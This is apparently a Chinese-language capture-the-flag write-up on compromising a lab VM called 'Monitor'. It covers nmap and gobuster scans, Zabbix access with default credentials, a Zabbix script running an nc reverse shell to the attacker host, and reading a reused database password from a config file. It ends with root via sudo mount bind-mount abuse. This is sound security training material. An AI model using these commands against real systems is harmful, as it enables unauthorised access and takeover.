信息收集
1
2
3
4
5
6
7
| ┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.31.92 08:00:27:1d:29:60 PCS Systemtechnik GmbH
┌──(root㉿kali)-[~]
└─# IP=192.168.31.92
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
| ┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-10 08:34 EDT
Nmap scan report for Monitor (192.168.31.92)
Host is up (0.00059s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: \xE7\x9B\x91\xE6\x8E\xA7\xE7\xB3\xBB\xE7\xBB\x9F\xE7\x99\xBB\xE5\xBD\x95
|_http-server-header: Apache/2.4.62 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 36034/udp6 mountd
| 100005 1,2,3 38236/udp mountd
| 100005 1,2,3 38947/tcp6 mountd
| 100005 1,2,3 41683/tcp mountd
| 100021 1,3,4 32829/tcp6 nlockmgr
| 100021 1,3,4 33419/tcp nlockmgr
| 100021 1,3,4 41563/udp nlockmgr
| 100021 1,3,4 60724/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
MAC Address: 08:00:27:1D:29:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms Monitor (192.168.31.92)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.21 seconds
|
目录扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| ┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.92
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,bk,bak,tar,php3,zip,gz,shtml,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/index.php (Status: 200) [Size: 1841]
/upload (Status: 301) [Size: 315] [--> http://192.168.31.92/upload/]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/dashboard.php (Status: 302) [Size: 0] [--> index.php]
/zabbix (Status: 301) [Size: 315] [--> http://192.168.31.92/zabbix/]
/.html (Status: 403) [Size: 278]
/.php (Status: 403) [Size: 278]
/server-status (Status: 403) [Size: 278]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================
|
直接打开尝试登录,随便试了下弱密码 admin/admin 就进去了,不过没啥用
扫出来 /zabbix ,搜了下默认账密是 Admin/zabbix
在 Administration - Scripts 创建脚本
1
| nc 192.168.31.58 23333 -e /bin/sh
|
kali 监听
在 Monitoring - Hosts 运行脚本反弹 shell
在 /home/hyh/user.txt 中取得 flag
1
| flag{user-ab0e0561b1a833a6141ad2273744543c}
|
提权
现在用的 netcat shell 是一个非交互式 Shell,用起来很不方便,所以要先稳定 shell
按顺序执行:
1
2
3
4
5
6
| script /dev/null -c bash
Ctrl + Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
|
查看 zabbix 的 web 配置文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
| zabbix@Monitor:/$ find / -name 'zabbix.conf.php' 2>/dev/null
/usr/share/zabbix/conf/zabbix.conf.php
/etc/zabbix/web/zabbix.conf.php
zabbix@Monitor:/$ cat /usr/share/zabbix/conf/zabbix.conf.php
<?php
// Zabbix GUI configuration file.
$DB['TYPE'] = 'MYSQL';
$DB['SERVER'] = 'localhost';
$DB['PORT'] = '0';
$DB['DATABASE'] = 'zabbix';
$DB['USER'] = 'zabbix';
$DB['PASSWORD'] = 'root123';
// Schema name. Used for PostgreSQL.
$DB['SCHEMA'] = '';
// Used for TLS connection.
$DB['ENCRYPTION'] = false;
$DB['KEY_FILE'] = '';
$DB['CERT_FILE'] = '';
$DB['CA_FILE'] = '';
$DB['VERIFY_HOST'] = false;
$DB['CIPHER_LIST'] = '';
// Vault configuration. Used if database credentials are stored in Vault secrets manager.
$DB['VAULT_URL'] = '';
$DB['VAULT_DB_PATH'] = '';
$DB['VAULT_TOKEN'] = '';
// Use IEEE754 compatible value range for 64-bit Numeric (float) history values.
// This option is enabled by default for new Zabbix installations.
// For upgraded installations, please read database upgrade notes before enabling this option.
$DB['DOUBLE_IEEE754'] = true;
// Uncomment and set to desired values to override Zabbix hostname/IP and port.
// $ZBX_SERVER = '';
// $ZBX_SERVER_PORT = '';
$ZBX_SERVER_NAME = 'Zabbix';
$IMAGE_FORMAT_DEFAULT = IMAGE_FORMAT_PNG;
// Uncomment this block only if you are using Elasticsearch.
// Elasticsearch url (can be string if same url is used for all types).
//$HISTORY['url'] = [
// 'uint' => 'http://localhost:9200',
// 'text' => 'http://localhost:9200'
//];
// Value types stored in Elasticsearch.
//$HISTORY['types'] = ['uint', 'text'];
// Used for SAML authentication.
// Uncomment to override the default paths to SP private key, SP and IdP X.509 certificates, and to set extra settings.
//$SSO['SP_KEY'] = 'conf/certs/sp.key';
//$SSO['SP_CERT'] = 'conf/certs/sp.crt';
//$SSO['IDP_CERT'] = 'conf/certs/idp.crt';
//$SSO['SETTINGS'] = [];
|
发现数据库密码是 root123,在 /home 下发现目录 hyh,尝试使用此密码登录用户 hyh
1
2
3
4
5
6
| zabbix@Monitor:/$ ls /home
hyh
zabbix@Monitor:/$ su hyh
Password:
hyh@Monitor:/$ id
uid=1000(hyh) gid=1000(hyh) groups=1000(hyh)
|
查看 sudo 权限
1
2
3
4
5
6
7
| hyh@Monitor:/$ sudo -l
Matching Defaults entries for hyh on Monitor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User hyh may run the following commands on Monitor:
(ALL) NOPASSWD: /usr/bin/mount
|
利用 mount 提权
1
2
3
4
5
6
| hyh@Monitor:/$ sudo mount -o bind /bin/sh /bin/mount
hyh@Monitor:/$ sudo mount
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
flag{root-deb15d884e04de6f6972b3c25e3cc11b}
|
1
| flag{root-deb15d884e04de6f6972b3c25e3cc11b}
|
Aristore
无特殊说明本博客所有文章均为原创,未经允许严禁转载
![Rrrdesk [群友靶机]](https://gitlab.com/aristorechina/blog_imgur/-/raw/main/2025/ctf_writeup_cover_2dcbf3013efda15f.gif)